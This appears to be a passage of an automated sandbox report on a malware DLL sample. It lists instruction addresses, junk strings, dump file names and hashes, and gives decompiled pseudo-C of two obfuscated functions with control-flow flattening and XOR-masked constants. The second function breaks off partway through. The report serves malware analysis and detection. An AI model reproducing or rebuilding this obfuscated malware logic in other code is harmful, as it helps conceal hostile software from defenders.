0x00d324cc
0x00d324d4
0x00d324df
0x00d324e7
0x00d324f2
0x00d324fd
0x00d32513
0x00d3251a
0x00d32525
0x00d32530
0x00d3253b
0x00d32546
0x00d32559
0x00d3255a
0x00d32561
0x00d3256c
0x00d32574
0x00d3257c
0x00d32584
0x00d3258c
0x00d32597
0x00d3259f
0x00d325aa
0x00d325b2
0x00d325ba
0x00d325bf
0x00d325c4
0x00d325cc
0x00d325e0
0x00d325f2
0x00d325f7
0x00d32600
0x00d3260b
0x00d32613
0x00d3261b
0x00d32623
0x00d3262b
0x00d32633
0x00d3263b
0x00d32643
0x00d3264b
0x00d32650
0x00d32658
0x00d32660
0x00d32665
0x00d3266a
0x00d32672
0x00d3267d
0x00d32688
0x00d32693
0x00d3269b
0x00d326a4
0x00d326a7
0x00d326ab
0x00d326b3
0x00d326bb
0x00d326c3
0x00d326cb
0x00d326d3
0x00d326db
0x00d326e6
0x00d326f1
0x00d326fc
0x00d32707
0x00d32712
0x00d3271d
0x00d32728
0x00d32733
0x00d3273e
0x00d32746
0x00d3274b
0x00d32755
0x00d32759
0x00d32761
0x00d3276c
0x00d32774
0x00d3277f
0x00d32792
0x00d32799
0x00d327a4
0x00d327ac
0x00d327b1
0x00d327b9
0x00d327c1
0x00d327c9
0x00d327d1
0x00d327d9
0x00d327e1
0x00d327e9
0x00d327f1
0x00d327fc
0x00d32807
0x00d32812
0x00d3281a
0x00d32822
0x00d32827
0x00d3282f
0x00d3283c
0x00d32840
0x00d32848
0x00d3284d
0x00d32857
0x00d3285f
0x00d32867
0x00d3286f
0x00d32874
0x00d3287c
0x00d32887
0x00d3288f
0x00d3289a
0x00d328a5
0x00d328ad
0x00d328b8
0x00d328c0
0x00d328c7
0x00d328c8
0x00d328cc
0x00d328d1
0x00d328d9
0x00d328e1
0x00d328ef
0x00d328f8
0x00d32901
0x00d32905
0x00d3290d
0x00d32918
0x00d32923
0x00d3292e
0x00d32936
0x00d3293b
0x00d32943
0x00d3294b
0x00d32953
0x00d3295b
0x00d32963
0x00d3296b
0x00d32970
0x00d32978
0x00d32980
0x00d32988
0x00d32990
0x00d32998
0x00d329a0
0x00d329a8
0x00d329b0
0x00d329b8
0x00d329c0
0x00d329cb
0x00d329d3
0x00d329de
0x00d329e6
0x00d329f3
0x00d329f7
0x00d329ff
0x00d32a07
0x00d32a0f
0x00d32a17
0x00d32a1f
0x00d32a27
0x00d32a32
0x00d32a3d
0x00d32a48
0x00d32a53
0x00d32a5e
0x00d32a66
0x00d32a71
0x00d32a79
0x00d32a81
0x00d32a89
0x00d32a91
0x00d32a99
0x00d32a9e
0x00d32aa6
0x00d32aae
0x00d32ab9
0x00d32ac6
0x00d32ad1
0x00d32ad8
0x00d32ad8
0x00d32add
0x00000000
0x00d32ae2
0x00d32af4
0x00d32d78
0x00d32da3
0x00d32dab
0x00d32dad
0x00d32de9
0x00d32de9
0x00d32de9
0x00d32dc1
0x00d32dc6
0x00d32dcb
0x00d32dd2
0x00d32dd9
0x00000000
0x00d32dde
0x00d32afc
0x00d32d64
0x00d32d6b
0x00d32d72
0x00000000
0x00d32d72
0x00d32b04
0x00d32cb3
0x00d32ce4
0x00d32ce9
0x00d32cec
0x00d32cee
0x00d32d02
0x00d32d17
0x00d32d1c
0x00d32c89
0x00d32c89
0x00d32ad8
0x00d32ad8
0x00d32add
0x00000000
0x00d32add
0x00d32ad8
0x00d32b10
0x00d32ca9
0x00000000
0x00d32ca9
0x00d32b1c
0x00d32b99
0x00d32bc1
0x00d32be2
0x00d32bef
0x00d32bf3
0x00d32bfa
0x00d32c46
0x00d32c63
0x00d32c68
0x00d32c85
0x00d32c87
0x00d32c90
0x00d32c9a
0x00d32c9c
0x00d32ca1
0x00000000
0x00d32ca1
0x00000000
0x00d32c87
0x00d32b24
0x00d32d56
0x00d32d56
0x00d32d5c
0x00000000
0x00000000
0x00000000
0x00d32d5c
0x00d32b2c
0x00d32b72
0x00000000
0x00d32b72
0x00d32b2e
0x00d32b39
0x00d32b58
0x00d32b5d
0x00d32b62
0x00000000
0x00000000
0x00d32b68
0x00000000
0x00d32b68
0x00d32d31
0x00d32d3d
0x00d32d44
0x00d32d49
0x00d32d4e
0x00d32d51
0x00000000
0x00d32d51

Strings

OAY, xrefs: 00D32812
$P, xrefs: 00D323DA
i*P, xrefs: 00D32633
5{,, xrefs: 00D328C0
J_%, xrefs: 00D329DE
8&, xrefs: 00D325C4
}j, xrefs: 00D326E6
|":, xrefs: 00D326FC
M%, xrefs: 00D327A4

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
API String ID: 0-2024644708
Opcode ID: d956548147c8a6e3dfb70952a21168a7c6d8682d0648da809026ba17f65cd520
Instruction ID: 51a42735d5984833389c1c60c056d2f0814ff1c105be8bc78bac7cb194925e36
Opcode Fuzzy Hash: d956548147c8a6e3dfb70952a21168a7c6d8682d0648da809026ba17f65cd520
Instruction Fuzzy Hash: D5320F714093819FD778CF61C58AB9BBBE1BBC4308F50891DE6DA96220D7B18949CF63

Uniqueness

Uniqueness Score: -1.00%

Function 00D4B257, Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00D4B257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E00D4FE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E00D52B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E00D3FA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E00D3DC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E00D3EE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E00D52B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E00D3C5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E00D3C5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E00D3C3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E00D4FD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E00D33046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}

0x00d4b261
0x00d4b26a
0x00d4b271
0x00d4b278
0x00d4b279
0x00d4b27a
0x00d4b27f
0x00d4b287
0x00d4b28a
0x00d4b294
0x00d4b29c
0x00d4b29e
0x00d4b2a6
0x00d4b2a8
0x00d4b2b0
0x00d4b2b5
0x00d4b2ba
0x00d4b2bf
0x00d4b2c4
0x00d4b2d9
0x00d4b2dc
0x00d4b2e3
0x00d4b2ee
0x00d4b2fb
0x00d4b2ff
0x00d4b307
0x00d4b30f
0x00d4b317
0x00d4b31f
0x00d4b324
0x00d4b32c
0x00d4b334
0x00d4b33c
0x00d4b352
0x00d4b359
0x00d4b364
0x00d4b36f
0x00d4b377
0x00d4b37c
0x00d4b384
0x00d4b38c
0x00d4b394
0x00d4b399
0x00d4b3a5
0x00d4b3a8
0x00d4b3ac
0x00d4b3b4
0x00d4b3bf
0x00d4b3ca
0x00d4b3d5
0x00d4b3e0
0x00d4b3e8
0x00d4b3f0
0x00d4b3f8
0x00d4b400
0x00d4b40d
0x00d4b411
0x00d4b419
0x00d4b421
0x00d4b429
0x00d4b434
0x00d4b43f
0x00d4b44a
0x00d4b452
0x00d4b457
0x00d4b45f
0x00d4b469
0x00d4b471
0x00d4b479
0x00d4b481
0x00d4b489
0x00d4b497
0x00d4b49c
0x00d4b4a2
0x00d4b4af
0x00d4b4b2
0x00d4b4b6
0x00d4b4be
0x00d4b4c9
0x00d4b4dc
0x00d4b4e3
0x00d4b4ee
0x00d4b4f6
0x00d4b4fb
0x00d4b503
0x00d4b50b
0x00d4b513
0x00d4b518
0x00d4b51c
0x00d4b524
0x00d4b528
0x00d4b52d
0x00d4b535
0x00d4b540
0x00d4b54b
0x00d4b553
0x00d4b55e
0x00d4b569
0x00d4b571
0x00d4b57c
0x00d4b584
0x00d4b58e
0x00d4b591
0x00d4b595
0x00d4b59d
0x00d4b5a5
0x00d4b5b0
0x00d4b5bb
0x00d4b5c6
0x00d4b5d9
0x00d4b5e0
0x00d4b5eb
0x00d4b5fb
0x00d4b5ff
0x00d4b607
0x00d4b60f
0x00d4b61b
0x00d4b61e
0x00d4b627
0x00d4b62b
0x00d4b633
0x00d4b63b
0x00d4b640
0x00d4b648
0x00d4b650
0x00d4b65b
0x00d4b663
0x00d4b670
0x00d4b67b
0x00d4b683
0x00d4b68e
0x00d4b6a3
0x00d4b6a6
0x00d4b6ad
0x00d4b6b8
0x00d4b6c3
0x00d4b6d9
0x00d4b6e0
0x00d4b6eb
0x00d4b6f3
0x00d4b6fb
0x00d4b704
0x00d4b709
0x00d4b70f
0x00d4b717
0x00d4b722
0x00d4b72d
0x00d4b738
0x00d4b740
0x00d4b745
0x00d4b74d
0x00d4b755
0x00d4b75d
0x00d4b762
0x00d4b76a
0x00d4b772
0x00d4b77a
0x00d4b782
0x00d4b78a
0x00d4b792
0x00d4b79a
0x00d4b7a5
0x00d4b7b0
0x00d4b7bb
0x00d4b7c6
0x00d4b7ce
0x00d4b7d9
0x00d4b7e1
0x00d4b7e9
0x00d4b7f3
0x00d4b7f6
0x00d4b7fa
0x00d4b802
0x00d4b80a
0x00d4b80f
0x00d4b81f
0x00d4b823
0x00d4b82b
0x00d4b836
0x00d4b841
0x00d4b84c
0x00d4b854
0x00d4b85c
0x00d4b864
0x00d4b86c
0x00d4b874
0x00d4b880
0x00d4b883
0x00d4b88f
0x00d4b893
0x00d4b89b
0x00d4b8a3
0x00d4b8ab
0x00d4b8b3
0x00d4b8bb
0x00d4b8c2
0x00d4b8c2
0x00d4b8c2
0x00d4b8c6
0x00d4b8c6
0x00d4b8cb
0x00d4b8cb
0x00d4b8cb
0x00d4b8cf
0x00d4b8cf
0x00d4b8cf
0x00d4b8d5
0x00000000
0x00000000
0x00d4b8db
0x00000000
0x00d4bb8a
0x00d4b8e7
0x00d4b9c3
0x00d4b9c4
0x00d4b9c5
0x00d4b9c6
0x00d4b9cd
0x00d4b9d1
0x00d4b9d5
0x00d4b9dc
0x00d4b9dd
0x00d4b9e1
0x00d4b9e2
0x00d4b9f3
0x00d4ba01
0x00d4ba08
0x00d4ba0d
0x00d4ba12
0x00d4bb1f
0x00d4bb1f
0x00d4b8c2
0x00d4b8c2
0x00d4b8c2
0x00000000
0x00d4b8c2
0x00d4ba18
0x00d4ba1f
0x00d4ba27
0x00d4ba39
0x00d4ba3d
0x00d4ba41
0x00000000
0x00d4ba41
0x00000000
0x00d4b8ed
0x00d4b8f3
0x00d4b99b
0x00d4b99d
0x00d4b9a0
0x00d4b9ab
0x00d4b9af
0x00d4b9b4
0x00000000
0x00d4b8f5
0x00d4b8fb
0x00d4b95f
0x00d4b966
0x00d4b8c2
0x00d4b8c2
0x00d4b8c2
0x00000000
0x00d4b8c2
0x00d4b8fd
0x00d4b903
0x00d4b947
0x00000000
0x00d4b905
0x00d4b90b
0x00d4bb65
0x00d4bb6b
0x00d4bb6d
0x00000000
0x00d4bb6d
0x00d4b911
0x00d4b924
0x00d4b925
0x00d4b92b
0x00d4b930
0x00d4b932
0x00d4b937
0x00d4b93d
0x00d4b8c2
0x00d4b8c2
0x00d4b8c2
0x00d4b8c6
0x00d4b8cb
0x00d4b8cb
0x00000000
0x00d4b8cb
0x00d4b8c2
0x00d4b937
0x00d4b90b
0x00d4b903
0x00d4b8fb
0x00d4b8f3
0x00d4bb95
0x00d4bb95
0x00000000
0x00d4bb95
0x00d4ba4f
0x00d4bb3c
0x00d4bb3d
0x00d4bb43
0x00d4bb48
0x00d4bb4a
0x00d4bb4f
0x00d4bb5b
0x00000000
0x00d4bb51
0x00d4bb51
0x00000000
0x00d4bb51
0x00d4ba55
0x00d4ba5b
0x00d4bb17
0x00d4bb1c
0x00000000
0x00d4ba61
0x00d4ba67
0x00d4bada
0x00d4badf
0x00d4bae7
0x00000000
0x00d4ba69
0x00d4ba6b
0x00d4ba9c
0x00d4bac3
0x00d4bacd
0x00d4bad2
0x00d4bb60
0x00d4bb60
0x00d4bb60
0x00000000
0x00d4ba6b
0x00d4ba67
0x00d4ba5b
0x00000000
0x00d4ba4f
0x00d4b8cb
0x00d4b8c6

Strings

{u, xrefs: 00D4B4A2
bu, xrefs: 00D4B6E0
E!, xrefs: 00D4B6F3
s4, xrefs: 00D4B513
B, xrefs: 00D4B6B8
[D, xrefs: 00D4B8B3
+V, xrefs: 00D4B457
&-, xrefs: 00D4B3E0
[7, xrefs: 00D4B7E1

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: s4$&-$+V$E!$[7$[D$bu${u$B
API String ID: 0-2389712741
Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction ID: 6df74be4bac2f7c00cc745ac4b12a58cc1c2999abd971fdb71b740083488dd90
Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction Fuzzy Hash: BC2213B25083809FE368CF25C98AA5BBBE1FBD4318F10891DE5D996260D7B18949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00D3C6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00D3C6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_push("true");
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_pop(_t506);
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
